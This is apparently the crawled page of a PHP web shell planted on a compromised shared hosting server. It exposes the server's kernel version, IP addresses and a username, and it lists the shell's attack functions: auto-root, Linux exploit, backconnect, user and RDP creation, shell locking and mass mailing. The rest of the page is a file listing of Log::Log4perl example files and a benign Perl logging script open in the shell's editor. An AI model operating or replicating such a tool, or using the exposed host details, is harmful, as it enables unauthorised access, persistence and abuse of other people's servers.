Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
liblog-log4perl-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
benchmarks
[ DIR ]
drwxr-xr-x
L4pResurrectable.pm
181
B
-rw-r--r--
color
768
B
-rwxr-xr-x
dupe-warning.conf
329
B
-rw-r--r--
jabber.conf
591
B
-rw-r--r--
l4p-tmpl
1.8
KB
-rwxr-xr-x
log4j-file-append-java.conf
532
B
-rw-r--r--
log4j-file-append-perl.conf
534
B
-rw-r--r--
log4j-manual-1.conf
508
B
-rw-r--r--
log4j-manual-2.conf
479
B
-rw-r--r--
log4j-manual-3.conf
541
B
-rw-r--r--
log4j-utf8.conf
219
B
-rw-r--r--
newsyslog-test
945
B
-rwxr-xr-x
override_appender
2.2
KB
-rwxr-xr-x
prototype
781
B
-rwxr-xr-x
syslog.pl
1.49
KB
-rwxr-xr-x
yamlparser
2.23
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : newsyslog-test
#!/usr/bin/perl -w ########################################### # newsyslog-test # Mike Schilli, 200t (m@perlmeister.com) ########################################### use strict; use Log::Log4perl qw(:easy); # newsyslog configuration: # /tmp/test.log 666 12 1 * B /tmp/test.pid 30 my $conf = q{ log4perl.category = DEBUG, Logfile log4perl.appender.Logfile = Log::Log4perl::Appender::File log4perl.appender.Logfile.recreate = 1 log4perl.appender.Logfile.recreate_check_signal = USR1 log4perl.appender.Logfile.recreate_pid_write = /tmp/test.pid log4perl.appender.Logfile.mode = append log4perl.appender.Logfile.filename = /tmp/test.log log4perl.appender.Logfile.layout = Log::Log4perl::Layout::PatternLayout log4perl.appender.Logfile.layout.ConversionPattern = %d %F{1} %L> %m%n }; Log::Log4perl->init(\$conf); while(1) { DEBUG "test" x 1000; system("ls -l /tmp/test.log* | head -2; echo"); sleep(1); }
Close